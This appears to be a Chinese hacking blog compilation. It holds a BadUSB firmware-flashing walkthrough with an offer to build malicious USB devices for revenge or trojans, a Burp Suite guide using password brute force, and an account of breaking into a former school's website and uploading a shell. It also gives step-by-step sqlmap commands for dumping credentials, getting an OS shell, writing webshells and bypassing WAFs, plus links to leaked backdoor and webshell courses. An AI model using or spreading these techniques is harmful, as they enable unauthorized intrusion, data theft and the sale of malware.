博客这段时间一直遭受各种攻击，逼我换回国内，再给钱加上防护盾。。。唉熊孩子们这能玩。使用ssl的时候就不停的DDOS，小小vps扛不住。那就不用。

今天才半天，各种扫描，sql注入，webshell探测，一大堆。。。看得不要不要的。。。实在不行就转到博客园，看你还攻击。。。

吐槽一句，做个博客，没和谁抢啥，也没啥盈利，干嘛盯着不放。醉了 -_-|| 谁有高防服务器，求搭伙。

首先 来看一下 图(如果刷坏或者想更改Payload,需要短接39和40针，再用官方刷写工具刷新),注意红色箭头标志：

0x00 前言 

关于Badusb可以参看这个视屏：http://v.qq.com/boke/page/l/g/w/l01425u2igw.html

不是很新的东西，其他作者已对此做过研究测试，本文仅用来记录操作过程，保存日志，说明细节。

0x01参考资料 

https://github.com/adamcaudill/Psychson 
https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payloads 
http://zone.wooyun.org/content/20001 

0x02环境搭建 

1、硬件 

U盘 ：东芝（TOSHIBA） 速闪系列 U盘 16GB （黑色） USB3.0 主控版本：Phison 2251-03 购买地址： http://item.jd.com/929732.html

2、软件 

Windows x64主机 

（1）Java Runtime Environment ：Java环境，用于支持Duckencoder 

（2）SDCC ：刷写U盘的环境，用于支持Psychson 

（3）Visual Studio 2012 ：编译Psychson的开发环境 

（4）Psychson ：BasUSB写入工具 （https://github.com/adamcaudill/Psychson）

（5）Burner File ：BN03V104M.BIN，必要的burner 

（6）USB-Rubber-Ducky Payload ：编写Payload的参考代码 （https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payloads）

（7）Duckencoder ：用于编译Payload 

（8）chipgenius 芯片检测工具 ：用于确定U盘型号 

0x03操作流程 

1、配置Payload 

进入DuckEncoder文件夹 

执行：

java -jar encoder.jar -i payload.txt -o inject.bin

说明： 

encoder.jar：文件夹自带 
payload.txt：可参考USB-Rubber-Ducky Payload 
inject.bin：执行代码后生成的文件 

2、生成固件 

执行：

Psychson-master\firmware\build.bat

生成fw.bin文件 

3、将Payload写入fw.bin文件 

执行：

EmbedPayload.exe inject.bin fw.bin

说明： 

EmbedPayload.exe：编译EmbedPayload工程得来 
inject.bin：操作1生成 
fw.bin：操作2生成 

4、将生成的固件写入U盘 

（1）执行

DriveCom.exe /drive=E /action=SetBootMode

设置U盘模式 

（2）执行

DriveCom.exe /drive=E /action=SendExecutable /burner=BN03V104M.BIN

操作burner 

（3）执行

DriveCom.exe /drive=E /action=SendFirmware /burner=BN03V104M.BIN /firmware=fw.bin

将fw.bin刷入U盘 

0x04 小结 

刷入成功后，下次插入U盘会模拟键盘操作，自动执行Payload 

0x05 补充 

如果刷坏或者想更改Payload,需要短接39和40针，再用官方刷写工具刷新 

相关工具以及国外的工具资料包请在这里下载：

链接: http://pan.baidu.com/s/1jIm22bk 密码: mrxn

欢迎私聊博主个人定制哦！价格实惠，保你满意，远控女神？试卷？老师的秘密？报复？格盘？改后缀？木马？都可以！哈哈

我只负责制作，怎么用那是你的事儿！你也可以自己按照教程制作，喜欢折腾的慢慢折腾去吧！

Burp Suite想必大家都用过，但是大家未必知道它的所有功能。因此，本文的主要目的就是尽量深入介绍各种功能。BurpSuite有以下这些功能：

[blue]

截获代理– 让你审查修改浏览器和目标应用间的流量。爬虫 – 抓取内容和功能

Web应用扫描器* –自动化检测多种类型的漏洞

Intruder – 提供强大的定制化攻击发掘漏洞

Repeater – 篡改并且重发请求

Sequencer –测试token的随机性

能够保存工作进度，以后再恢复

插件*–  你可以自己写插件或者使用写好的插件，插件可以执行复杂的，高度定制化的任务

*表示需要Burp Suite Pro授权。

[/blue]

Intercepting Proxy（截取代理）

Intercepting proxy是针对web应用渗透测试工具的功能。Burp Suite的代理工具非常容易使用，并且能和其他工具紧密配合。要使用这个功能，第一步就是建立代理监听(Proxy–> Options功能下)。我的设置为了默认值localhost (127.0.0.1)，端口为8080。

你可以点击编辑(“Edit”)进行修改，或者添加新的监听端口。一旦建立好，你就要到浏览器的网络连接设置处手动配置代理设置：

我们现在可以访问我们要测试的应用，然后看到发送的所有请求了。到Proxy –> Intercept标签页，然后确保截获功能开启(“Intercept is on”)，然后就能看到所有的请求了。

你可以修改请求，然后点击“Forward”发送修改后的请求，如果不想发送某些请求你也可以点击“Drop”按钮。“Actions”按钮下还有很多其他的功能。

如果你想回过头看下前面发送的请求，你可以切换到Proxy –> HTTP History标签页，这里有所有的请求列表，还有些详情如响应的长度，MIME类型和状态码。如果你修改过请求，你会看到两个标签，分别是修改前和修改后的请求：

另一个有用的功能是自动修改请求/响应，功能位于Proxy –> Options。通过这个功能可以去除JavaScript的表单验证。你也可以用正则表达式匹配替换请求/响应：

Spider（爬虫）

当你在对web应用进行初步检查的时候，Burp Suite的spider工具非常有用。当你浏览Web应用时，它会从HTML响应内容中主动生成一份URL列表，然后尝试连接URL。要使用爬虫功能，我们首先要切换到Target–> Site Map标签，然后右键域名，选择“Add To Scope”：

所有加入的域名都在Target –> Scope标签页里。你可以手动添加域名，修改，或者添加需要配出的URL（比如如果你不希望对“联系我们”的表单进行自动化测试，就可以把它排除掉）：

如果我们现在进入Spider –> Control标签，就能看到有些URL正在排队中，注意看下面，爬虫只会对scope中的域名进行测试：

回到Site Map我们可以看到URL的列表，黑色代表我们已经成功访问过那个页面，爬虫确认过是有效的。灰色代表爬虫在HTML响应中找到了这个URL但是还没有确认是否有效：

基本的设置后，我们返回到Spider –> Control标签，点击“Spider Is Paused”按钮运行工具，它会尝试连接所有之前找到的URL，包括在运行过程中找到的新的。如果过程中有表单需要填写，它会弹出表单供你填写，确保能收到有效的响应：

现在Site Map中就有整理整齐的URL了：

Spider –> Options标签下有些你可以调整的选项，如user-agent ，或者爬虫应该爬多深，两个重要的设置是表单提交和应用登录，设置好之后爬虫可以自动为你填写表单：

Intruder

Intruder是Burp Suite中最受欢迎的工具。Intruder是获取Web应用信息的工具。它可以用来爆破，枚举，漏洞测试等任何你想要用的测试手段，然后从结果中获取数据。

我举个例子来演示Intruder的使用方法。即爆破登录页面的管理员密码（假设没有帐号锁定）。首先，我们切换到Proxy-> HTTP History，右键要测试的请求，点击“Send To Intruder”：

接下来我们切换到Intruder标签，准备攻击。程序会在Target标签里自动填上请求中的host和端口。在Position（位置）标签出哦我们可以看到我们选择的请求并设置我们要攻击的位置。用鼠标高亮想要攻击的位置， 然后点击右边的“Add”，如果需要的话可以选择多个位置：

最上面的地方有多种攻击类型，本例中我们使用默认的Sniper，但实际上每种攻击类型都有特定用途：

[blue]

Sniper – 这个模式使用单一的payload组。它会针对每个位置设置payload。这种攻击类型适合对常见漏洞中的请求参数单独地进行fuzzing测试。攻击中的请求总数应该是position数量和payload数量的乘积。

Battering ram – 这一模式使用单一的payload组。它会重复payload并且一次把所有相同的payload放入指定的位置中。这种攻击适合那种需要在请求中把相同的输入放到多个位置的情况。请求的总数是payload组中payload的总数。

Pitchfork – 这一模式使用多个payload组。对于定义的位置可以使用不同的payload组。攻击会同步迭代所有的payload组，把payload放入每个定义的位置中。这种攻击类型非常适合那种不同位置中需要插入不同但相关的输入的情况。请求的数量应该是最小的payload组中的payload数量。

Cluster bomb – 这种模式会使用多个payload组。每个定义的位置中有不同的payload组。攻击会迭代每个payload组，每种payload组合都会被测试一遍。这种攻击适用于那种位置中需要不同且不相关或者未知的输入的攻击。攻击请求的总数是各payload组中payload数量的乘积。

[/blue]

位置设定好之后我们切换到Payloads标签，选择攻击时使用的数据。顶部的地方你可以看到payload组。各个组都对应设置的各个位置。我们可以选择payload类型，如简易列表(Simple List)。

在那下面有一些payload选项。每个payload类型都有不同的选项，供用户为你的测试进行修改。我经常使用的是数字(Numbers)，你可以设置范围，选择是连续的数字还是随机数字，还有每次攻击时的步长等。不过对于我们要搞的爆破攻击，我们只需要添加一个密码字典就行：

接下来就是点击右上角的开始攻击(Start Attack)按钮。程序就会弹出一个新的窗口，显示的是尝试的每个payload和响应的详情。我们的例子中，第六个请求获取到了正确的密码：

我们返回主窗口，然后切换到Intruder –> Options标签页，可以发现还有些别配置。其中一个很重要的是“Grep– Match”功能，这个功能可以让你基于HTML中的字符串或者正则表达式标记出结果。这些标记会在新增的栏里出现。

[green]注：免费版的Burp Suite会对Intruder限速，专业版会更快。[/green]

Repeater(重复器)、decoder(解码器)和comparer(比较器)也很有用，但由于使用简单，在此就不再赘述了。

原文地址：https://matttheripperblog.files.wordpress.com/2016/01/add-to-scope.png?w=770

工具下载地址：渗透测试神器Burpsuite Pro v1.6.38（含下载）

作者：宝顺

前上学的学校。早就毕业了的，上学时候就一直想拿下来玩玩，不过总是忘了。今天无聊就拿下来了。。

目标站：xxxxxx.com

首先找后台地址。随便加了个admin。就是了，等等。。好像不对，为啥显示了部分内容才弹出的未登录的提示框。

相信大家都明白，写程序的时候验证是否登录的代码放到了现在显示的这些代码的后面，所里浏览器就先执行前面的代码（这个大家都懂，浏览器就按照先后顺序执行的代码）

而且还是js弹窗，好办了，禁止js代码就行了。毕竟是客户端的东西嘛！

火狐的禁止方法（其他浏览器的自行百度）：

再地址栏输入about:config，点击回车键

在搜索地址栏中输入javascript.enabled

鼠标右键第一个，弹出菜单。再点击切换

当一行的中的，值由trun变成false。时候说明已经关闭了。

好了。js已经禁用了。

我们刷新页面试试。

已经执行js代码了。

接下来就是找可以登录后台的漏洞了。因为他执行了一个个人管理的代码。

我们右键审查元素。

看到了个密码修改的地址，点进去看看。

可以添加用户了。

我们添加个用户，然后后台登录。

我就不截图了

登录成功。

ok

拿shell更简单了。随便找了个地方任意文件上传。至于服务器就不提了，毕竟不会。。

发这个文章主要是告诉各位朋友，拿站方法千千万，一定要灵活的去入侵，不要那么死板。

出处：宝顺 'S Blog  - 入侵之前的学校的网站的过程

众所周知，Burp Suite是响当当的web应用程序渗透测试集成平台。从应用程序攻击表面的最初映射和分析，到寻找和利用安全漏洞等过程，所有工具为支持整体测试程序而无缝地在一起工作。

平台中所有工具共享同一robust框架，以便统一处理HTTP请求、持久性、认证、上游代理、日志记录、报警和可扩展性。Burp Suite允许攻击者结合手工和自动技术去枚举、分析、攻击Web应用程序。

TeX拦截代理（Proxy）：你可以检查和更改浏览器与目标应用程序间的流量；

可感知应用程序的网络爬虫（Spider）：它能完整的枚举应用程序的内容和功能；高级扫描器，执行后它能自动地发现web应用程序的安全漏洞；

入侵测试工具（Intruder）：用于执行强大的定制攻击去发现及利用不同寻常的漏洞；

重放工具（Repeater）：一个靠手动操作来触发单独的HTTP 请求，并分析应用程序响应的工具；

会话工具（Sequencer）：用来分析那些不可预知的应用程序会话令牌和重要数据项的随机性的工具；解码器，进行手动执行或对应用程序数据者智能解码编码的工具；扩展性强，可以让你加载Burp Suite的扩展，使用你自己的或第三方代码来扩展Burp Suit的功能。

sqlmap也是渗透中常用的一个注入工具，其实在注入工具方面，一个sqlmap就足够用了，只要你用的熟，秒杀各种工具，只是一个便捷性问题，sql注入另一方面就是手工党了，这个就另当别论了。今天把我一直以来整理的sqlmap笔记发布上来供大家参考。

一共有11种，乌云知识库也有一片比较全面的介绍各个参数的文章：

SQLmap用户手册：http://drops.wooyun.org/tips/143

1.SQLMAP用于Access数据库注入

(1)猜解是否能注入

win: python sqlmap.py -u "http://www.xxx.com/en/CompHonorBig.asp?id=7"

Linux : ./sqlmap.py -u "http://www.xxx.com/en/CompHonorBig.asp?id=7"



(2)猜解表

win: python sqlmap.py -u "http://www.xxx.com/en/CompHonorBig.asp?id=7" --tables

Linux: ./sqlmap.py -u "http://www.xxx.com/en/CompHonorBig.asp?id=7" --tables



(3)根据猜解的表进行猜解表的字段(假如通过2得到了admin这个表)

win: python sqlmap.py -u "http://www.xxx.com/en/CompHonorBig.asp?id=7" --columns -T admin

Linux: ./sqlmap.py -u "http://www.xxx.com/en/CompHonorBig.asp?id=7" --columns -T admin



(4)根据字段猜解内容(假如通过3得到字段为username和password)

win: python sqlmap.py -u "http://www.xxx.com/en/CompHonorBig.asp?id=7" --dump -T admin -C "username,password"

Linux: ./sqlmap.py -u "http://www.xxx.com/en/CompHonorBig.asp?id=7" --dump -T admin -C

"username,password"



2.SQLMAP用于Cookie注入

(1)cookie注入，猜解表

win : python sqlmap.py -u "http://www.xxx.org/jsj/shownews.asp" --cookie "id=31" --table --level 2



(2)猜解字段，(通过1的表猜解字段，假如表为admin)

win :python sqlmap.py -u "http://www.xxx.org/jsj/shownews.asp" --cookie "id=31" --columns -T

admin --level 2



(3)猜解内容

win :python sqlmap.py -u "http://www.xxx.org/jsj/shownews.asp" --cookie "id=31" --dump -T

admin -C "username,password" --level 2



3.SQLMAP用于mysql中DDOS攻击

(1)获取一个Shell

win:

python sqlmap.py -u http://192.168.159.1/news.php?id=1 --sql-shell

Linux:

sqlmap -u http://192.168.159.1/news.php?id=1 --sql-shell



(2)输入执行语句完成DDOS攻击

select benchmark(99999999999,0x70726f62616e646f70726f62616e646f70726f62616e646f)



4.SQLMAP用于mysql注入

(1)查找数据库

python sqlmap.py -u "http://www.xxx.com/link.php?id=321" --dbs



(2)通过第一步的数据库查找表(假如数据库名为dataname)

python sqlmap.py -u "http://www.xxx.com/link.php?id=321" -D dataname --tables



(3)通过2中的表得出列名(假如表为table_name)

python sqlmap.py -u "http://www.xxx.com/link.php?id=321" -D dataname -T table_name --columns



(4)获取字段的值(假如扫描出id,user,password字段)

python sqlmap.py -u "http://www.xxx.com/link.php?id=321" -D dataname -T table_name -C

"id,user,password" --dump



5.SQLMAP中post登陆框注入

(1)其中的search-test.txt是通过抓包工具burp suite抓到的包并把数据保存为这个txt文件

我们在使用Sqlmap进行post型注入时，

经常会出现请求遗漏导致注入失败的情况。

这里分享一个小技巧，即结合burpsuite来使用sqlmap，

用这种方法进行post注入测试会更准确，操作起来也非常容易。

1. 浏览器打开目标地址http:// www.xxx.com /Login.asp
   
2. 配置burp代理(127.0.0.1:8080)以拦截请求
   
3. 点击login表单的submit按钮
   
4. 这时候Burp会拦截到了我们的登录POST请求
   
5. 把这个post请求复制为txt, 我这命名为search-test.txt 然后把它放至sqlmap目录下
   
6. 运行sqlmap并使用如下命令：
   
   ./sqlmap.py -r search-test.txt -p tfUPass
   
   这里参数-r 是让sqlmap加载我们的post请求rsearch-test.txt，
   
   而-p 大家应该比较熟悉，指定注入用的参数。
   
   注入点：http://testasp.vulnweb.com/Login.asp
   
   几种注入方式：./sqlmap.py -r search-test.txt -p tfUPass
   
   
   
   (2)自动的搜索
   
   sqlmap -u http://testasp.vulnweb.com/Login.asp --forms
   
   
   
   (3)指定参数搜索
   
   sqlmap -u http://testasp.vulnweb.com/Login.asp --data "tfUName=321&tfUPass=321"
   
   
   
   6.SQLMAP中Google搜索注入
   
   inurl后面的语言是由自己定的
   
   注入过程中如果选y是注入，如果不是选n
   
   sqlmap -g inurl:php?id=
   
   
   
   7.SQLMAP中的请求延迟
   
   参数 --delay --safe-freq
   
   
   
   python sqlmap.py --dbs -u "http://xxx.cn/index.php/Index/view/id/40.html" --delay 1
   
   python sqlmap.py --dbs -u "http://xxx.cn/index.php/Index/view/id/40.html" --safe-freq 3
   
   参数
   
   
   
   8.SQLMAP绕过WAF防火墙
   
   注入点:http://192.168.159.1/news.php?id=1
   
   sqlmap -u http://192.168.159.1/news.php?id=1 -v 3 --dbs --batch --tamper "space2morehash.py"
   
   space2morehash.py中可以替换space2hash.py或者base64encode.py或者charencode.py
   
   都是编码方式
   
   space2hash.py base64encode.py charencode.py
   
   
   
   9.SQLMAP查看权限
   
   sqlmap -u http://192.168.159.1/news.php?id=1 --privileges
   
   
   
   10.SQLMAP伪静态注入
   
   (1)查找数据库
   
   python sqlmap.py -u "http://xxx.cn/index.php/Index/view/id/40.html" --dbs
   
   
   
   (2)通过1中的数据库查找对应的表 (假如通过1，得到的是dataname)
   
   python sqlmap.py -u "http://xxx.cn/index.php/Index/view/id/40.html" -D dataname --tables
   
   
   
   (3)通过2中的数据表得到字段(假如得到的是tablename表)
   
   python sqlmap.py -u "http://xxx.cn/index.php/Index/view/id/40.html" -D dataname -T
   
   tablename --columns
   
   
   
   (4)通过3得到字段值(假如从3中得到字段id，password)
   
   python sqlmap.py -u "http://xxx.cn/index.php/Index/view/id/40.html" -D dataname -T
   
   tablename -C "password" --dump
   
   
   
   11.SQLMAP注入点执行命令与交互写shell
   
   (1)
   
   注入点：http://192.168.159.1/news.php?id=1
   
   
   
   此处采用的是Linux系统
   
   sqlmap -u http://192.168.159.1/news.php?id=1 --os-cmd=ipconfig
   
   出现语言的选择根据实际的测试网站选择语言
   
   指定目标站点D:/www/
   
   
   
   (2)获取Shell
   
   sqlmap -u http://192.168.159.1/news.php?id=1 --os-shell
   
   出现语言的选择根据实际的测试网站选择语言
   

   指定目标站点D:/www/

   输入ipconfig/all
   
   创建用户和删除用户
   

   只要权限足够大，你可以输入使用任何命令。

   其他命令参考下面：

   从数据库中搜索字段

   sqlmap -r “c:\tools\request.txt” –dbms mysql -D dedecms –search -C admin,password
   在dedecms数据库中搜索字段admin或者password。

   读取与写入文件

   首先找需要网站的物理路径，其次需要有可写或可读权限。

   –file-read=RFILE 从后端的数据库管理系统文件系统读取文件 （物理路径）
   –file-write=WFILE 编辑后端的数据库管理系统文件系统上的本地文件 （mssql xp_shell）
   –file-dest=DFILE 后端的数据库管理系统写入文件的绝对路径
   #示例：
   sqlmap -r “c:\request.txt” -p id –dbms mysql –file-dest “e:\php\htdocs\dvwa\inc\include\1.php” –file-write “f:\webshell\1112.php”

   使用shell命令：

   sqlmap -r “c:\tools\request.txt” -p id –dms mysql –os-shell
   接下来指定网站可写目录：
   “E:\php\htdocs\dvwa”

   #注：mysql不支持列目录，仅支持读取单个文件。sqlserver可以列目录，不能读写文件，但需要一个（xp_dirtree函数）

   sqlmap详细命令：

   • –is-dba 当前用户权限（是否为root权限）
   • –dbs 所有数据库
   • –current-db 网站当前数据库
   • –users 所有数据库用户
   • –current-user 当前数据库用户
   • –random-agent 构造随机user-agent
   • –passwords 数据库密码
   • –proxy http://local:8080 –threads 10 (可以自定义线程加速) 代理
   • –time-sec=TIMESEC DBMS响应的延迟时间（默认为5秒）

   ——————————————————————————————————

   Options（选项）：

   • –version 显示程序的版本号并退出
   • -h, –help 显示此帮助消息并退出
   • -v VERBOSE 详细级别：0-6（默认为1）

   Target（目标）：

   以下至少需要设置其中一个选项，设置目标URL。

   • -d DIRECT 直接连接到数据库。
   • -u URL, –url=URL 目标URL。
   • -l LIST 从Burp或WebScarab代理的日志中解析目标。
   • -r REQUESTFILE 从一个文件中载入HTTP请求。
   • -g GOOGLEDORK 处理Google dork的结果作为目标URL。
   • -c CONFIGFILE 从INI配置文件中加载选项。

   Request（请求）：

   这些选项可以用来指定如何连接到目标URL。

   • –data=DATA 通过POST发送的数据字符串
   • –cookie=COOKIE HTTP Cookie头
   • –cookie-urlencode URL 编码生成的cookie注入
   • –drop-set-cookie 忽略响应的Set – Cookie头信息
   • –user-agent=AGENT 指定 HTTP User – Agent头
   • –random-agent 使用随机选定的HTTP User – Agent头
   • –referer=REFERER 指定 HTTP Referer头
   • –headers=HEADERS 换行分开，加入其他的HTTP头
   • –auth-type=ATYPE HTTP身份验证类型（基本，摘要或NTLM）(Basic, Digest or NTLM)
   • –auth-cred=ACRED HTTP身份验证凭据（用户名:密码）
   • –auth-cert=ACERT HTTP认证证书（key_file，cert_file）
   • –proxy=PROXY 使用HTTP代理连接到目标URL
   • –proxy-cred=PCRED HTTP代理身份验证凭据（用户名：密码）
   • –ignore-proxy 忽略系统默认的HTTP代理
   • –delay=DELAY 在每个HTTP请求之间的延迟时间，单位为秒
   • –timeout=TIMEOUT 等待连接超时的时间（默认为30秒）
   • –retries=RETRIES 连接超时后重新连接的时间（默认3）
   • –scope=SCOPE 从所提供的代理日志中过滤器目标的正则表达式
   • –safe-url=SAFURL 在测试过程中经常访问的url地址
   • –safe-freq=SAFREQ 两次访问之间测试请求，给出安全的URL

   Enumeration（枚举）：

   这些选项可以用来列举后端数据库管理系统的信息、表中的结构和数据。此外，您还可以运行
   您自己的SQL语句。

   • -b, –banner 检索数据库管理系统的标识
   • –current-user 检索数据库管理系统当前用户
   • –current-db 检索数据库管理系统当前数据库
   • –is-dba 检测DBMS当前用户是否DBA
   • –users 枚举数据库管理系统用户
   • –passwords 枚举数据库管理系统用户密码哈希
   • –privileges 枚举数据库管理系统用户的权限
   • –roles 枚举数据库管理系统用户的角色
   • –dbs 枚举数据库管理系统数据库
   • -D DBname 要进行枚举的指定数据库名
   • -T TBLname 要进行枚举的指定数据库表（如：-T tablename –columns）
   • –tables 枚举的DBMS数据库中的表
   • –columns 枚举DBMS数据库表列
   • –dump 转储数据库管理系统的数据库中的表项
   • –dump-all 转储所有的DBMS数据库表中的条目
   • –search 搜索列（S），表（S）和/或数据库名称（S）
   • -C COL 要进行枚举的数据库列
   • -U USER 用来进行枚举的数据库用户
   • –exclude-sysdbs 枚举表时排除系统数据库
   • –start=LIMITSTART 第一个查询输出进入检索
   • –stop=LIMITSTOP 最后查询的输出进入检索
   • –first=FIRSTCHAR 第一个查询输出字的字符检索
   • –last=LASTCHAR 最后查询的输出字字符检索
   • –sql-query=QUERY 要执行的SQL语句
   • –sql-shell 提示交互式SQL的shell

   Optimization（优化）：

   这些选项可用于优化SqlMap的性能。

   • -o 开启所有优化开关
   • –predict-output 预测常见的查询输出
   • –keep-alive 使用持久的HTTP（S）连接
   • –null-connection 从没有实际的HTTP响应体中检索页面长度
   • –threads=THREADS 最大的HTTP（S）请求并发量（默认为1）

   Injection（注入）：

   这些选项可以用来指定测试哪些参数， 提供自定义的注入payloads和可选篡改脚本。

   • -p TESTPARAMETER 可测试的参数（S）
   • –dbms=DBMS 强制后端的DBMS为此值
   • –os=OS 强制后端的DBMS操作系统为这个值
   • –prefix=PREFIX 注入payload字符串前缀
   • –suffix=SUFFIX 注入payload字符串后缀
   • –tamper=TAMPER 使用给定的脚本（S）篡改注入数据

   Detection（检测）：

   这些选项可以用来指定在SQL盲注时如何解析和比较HTTP响应页面的内容。

   • –level=LEVEL 执行测试的等级（1-5，默认为1）
   • –risk=RISK 执行测试的风险（0-3，默认为1）
   • –string=STRING 查询时有效时在页面匹配字符串
   • –regexp=REGEXP 查询时有效时在页面匹配正则表达式
   • –text-only 仅基于在文本内容比较网页

   Techniques（技巧）：

   这些选项可用于调整具体的SQL注入测试。

   • –technique=TECH SQL注入技术测试（默认BEUST）
   • –time-sec=TIMESEC DBMS响应的延迟时间（默认为5秒）
   • –union-cols=UCOLS 定列范围用于测试UNION查询注入
   • –union-char=UCHAR 用于暴力猜解列数的字符

   Fingerprint（指纹）：

   • -f, –fingerprint 执行检查广泛的DBMS版本指纹

   Brute force（蛮力）：

   这些选项可以被用来运行蛮力检查。

   • –common-tables 检查存在共同表
   • –common-columns 检查存在共同列

   User-defined function injection（用户自定义函数注入）：
   这些选项可以用来创建用户自定义函数。

   –udf-inject 注入用户自定义函数
   –shared-lib=SHLIB 共享库的本地路径

   File system access（访问文件系统）：

   这些选项可以被用来访问后端数据库管理系统的底层文件系统。

   • –file-read=RFILE 从后端的数据库管理系统文件系统读取文件
   • –file-write=WFILE 编辑后端的数据库管理系统文件系统上的本地文件
   • –file-dest=DFILE 后端的数据库管理系统写入文件的绝对路径

   Operating system access（操作系统访问）：

   这些选项可以用于访问后端数据库管理系统的底层操作系统。

   • –os-cmd=OSCMD 执行操作系统命令
   • –os-shell 交互式的操作系统的shell
   • –os-pwn 获取一个OOB shell，meterpreter或VNC
   • –os-smbrelay 一键获取一个OOB shell，meterpreter或VNC
   • –os-bof 存储过程缓冲区溢出利用
   • –priv-esc 数据库进程用户权限提升
   • –msf-path=MSFPATH Metasploit Framework本地的安装路径
   • –tmp-path=TMPPATH 远程临时文件目录的绝对路径

   Windows注册表访问：

   这些选项可以被用来访问后端数据库管理系统Windows注册表。

   • –reg-read 读一个Windows注册表项值
   • –reg-add 写一个Windows注册表项值数据
   • –reg-del 删除Windows注册表键值
   • –reg-key=REGKEY Windows注册表键
   • –reg-value=REGVAL Windows注册表项值
   • –reg-data=REGDATA Windows注册表键值数据
   • –reg-type=REGTYPE Windows注册表项值类型

   这些选项可以用来设置一些一般的工作参数。

   • -t TRAFFICFILE 记录所有HTTP流量到一个文本文件中
   • -s SESSIONFILE 保存和恢复检索会话文件的所有数据
   • –flush-session 刷新当前目标的会话文件
   • –fresh-queries 忽略在会话文件中存储的查询结果
   • –eta 显示每个输出的预计到达时间
   • –update 更新SqlMap
   • –save file保存选项到INI配置文件
   • –batch 从不询问用户输入，使用所有默认配置。

   Miscellaneous（杂项）：

   • –beep 发现SQL注入时提醒
   • –check-payload IDS对注入payloads的检测测试
   • –cleanup SqlMap具体的UDF和表清理DBMS
   • –forms 对目标URL的解析和测试形式
   • –gpage=GOOGLEPAGE 从指定的页码使用谷歌dork结果
   • –page-rank Google dork结果显示网页排名（PR）
   • –parse-errors 从响应页面解析数据库管理系统的错误消息
   • –replicate 复制转储的数据到一个sqlite3数据库
   • –tor 使用默认的Tor（Vidalia/ Privoxy/ Polipo）代理地址
   • –wizard 给初级用户的简单向导界面

免责申明：

请使用者注意使用环境并遵守国家相关法律法规!

由于使用不当造成的后果本作者不承担任何责任!

----------------------------------------------------------------------------

/*
渗透测试中免不了一些小工具，网上也有许多，但有些不是失效就是操作繁琐。
然后自己琢磨了几个小工具集成一起，界面有点随便，后期会慢慢的进行更改、增加一些功能。T00ls.Net - 低调求发展 - 技术无止境 - Focus On Network Security0 C7 L% M9 Y/ o& L9 M" I
T00ls.Net - 低调求发展 - 技术无止境 - Focus On Network Security2 ?( ?; J3 P: j
会持续更新本程序，有任何问题、BUG、建议烦请联系：[email protected]
*/T00ls.Net - 低调求发展 - 技术无止境 - Focus On Network Security+ ]6 K- u) ~8 C7 Q3 W: P5 C
2015-09-18
*        搜索引擎抓取：调用本机IE8浏览器通过搜索引擎抓取连接，暂时仅支持IE8。
*        C段 旁注查询：同服域名查询/C段查询/自定义IP段查询。 - 低调求发展$ Y) Y* u/ Y2 G( Q$ o- D
*        子域名爆破：渗透测试中能快速定位测试目标的子域信息，可进行多级域名爆破，功能简单，以后慢慢增加DNS、Whois、子域查询功能。 - 专注网络安全- \% N& S& w8 ^# b0 t
*        Http Form、Http Basic万能暴力破解：主要针对无防火墙，无验证码等防护。进行post提交方式猜解用户密码。T00ls.Net - 低调求发展 - 技术无止境 - Focus On Network Security0 n. A9 [. ?5 g; n7 q; d" T
2015-11-04
*        搜索引擎抓取：更新了支持环境，支持IE8、IE9、IE10、IE11。搜索引擎批量检测最新Joomla3.2-3.4.4漏洞。0 [- v! w" q' S" e* K
*        Joomla EXP利用工具：结合搜索引擎对Joomla进行注射检测。
2015-11-06
*        增加导入功能，对Joomla进行批量检测。

链接：http://pan.baidu.com/s/1ntAeHXR 密码：cm58

内容：

众所周知黑帽盒子内部以后门程序出名，此套系列课程是内部培训思路及方法的教程，价值不可估量。

此系列课程看完后绝对颠覆你的价值观和世界观。绝对值得收藏！目前下载链接还有效，大家记得及时下载！

内部项目零-前言 链接: http://pan.baidu.com/s/1o6zTbMq 密码: tpw8

内部项目一-后门程序是什么  链接: http://pan.baidu.com/s/1gdHItaF 密码: pe7c

内部项目二-养好自己的箱子链接: http://pan.baidu.com/s/1kTnNShx 密码: nt94

内部项目三-大数据如何处理 链接: http://pan.baidu.com/s/1qW9YxB2 密码: ijb4

第四第五因需要注册码，所以改成演示的视频。

内部项目四-xise菜刀后门箱子 链接: http://pan.baidu.com/s/1qW9UDGg 密码:  ua48

内部项目五-红色中国菜刀webshell箱子 链接:  http://pan.baidu.com/s/1jG8eWwI   密码:  25my

内部项目六（一）谈盈利，团队.rar 链接: http://pan.baidu.com/s/1qifuu 密码: n7gp

内部项目六（二）谈盈利，团队.rar 链接: http://pan.baidu.com/s/1hq76QUC 密码: ikfe

内部项目七-上网和资金安全.rar 链接: http://pan.baidu.com/s/1kTiynLP 密码: d3kr

内部项目八-养站技巧.rar 链接: http://pan.baidu.com/s/1hqrrN4C 密码: mq6n

等等 .. 陆续还有很多视频没泄露出来。此福利共享给大家

下面给出一个备份的汇总链接地址，你也可以选择这个直接保存到自己网盘观看，同时后面更新的也会在这个文件夹内分享：链接: http://pan.baidu.com/s/1nt4ER0l 密码: eraa

注：原文出自暗月博客，http://www.moonsec.com/post-582.html

sqlmap -u “http://url/news?id=1″ –dbms “Mysql” –users # dbms 指定数据库类型

sqlmap -u “http://url/news?id=1″ –users #列数据库用户

sqlmap -u “http://url/news?id=1″ –dbs#列数据库

sqlmap -u “http://url/news?id=1″ –passwords #数据库用户密码

sqlmap -u “http://url/news?id=1″ –passwords-U root -v 0 #列出指定用户 数据库密码

sqlmap  -u  “http://url/news?id=1″   –dump  -C  “password,user,id”  -T “tablename”-D “db_name”

–start 1 –stop 20 #列出指定字段，列出20 条

sqlmap -u “http://url/news?id=1″ –dump-all -v 0 #列出所有数据库所有表

sqlmap -u “http://url/news?id=1″ –privileges #查看权限

sqlmap -u “http://url/news?id=1″ –privileges -U root #查看指定用户权限sqlmap -u “http://url/news?id=1″ –is-dba -v 1 #是否是数据库管理员sqlmap -u “http://url/news?id=1″ –roles #枚举数据库用户角色

sqlmap -u “http://url/news?id=1″ –udf-inject #导入用户自定义函数（获取 系统权限！）

sqlmap -u “http://url/news?id=1″ –dump-all –exclude-sysdbs -v 0 #列 出当前库所有表

sqlmap -u “http://url/news?id=1″ –union-cols #union 查询表记录

sqlmap -u “http://url/news?id=1″ –cookie “COOKIE_VALUE”#cookie注入

sqlmap -u “http://url/news?id=1″ -b #获取banner信息

sqlmap -u “http://url/news?id=1″ –data “id=3″#post注入

sqlmap -u “http://url/news?id=1″ -v 1 -f #指纹判别数据库类型

sqlmap -u “http://url/news?id=1″ –proxy“http://127.0.0.1:8118” #代理注 入

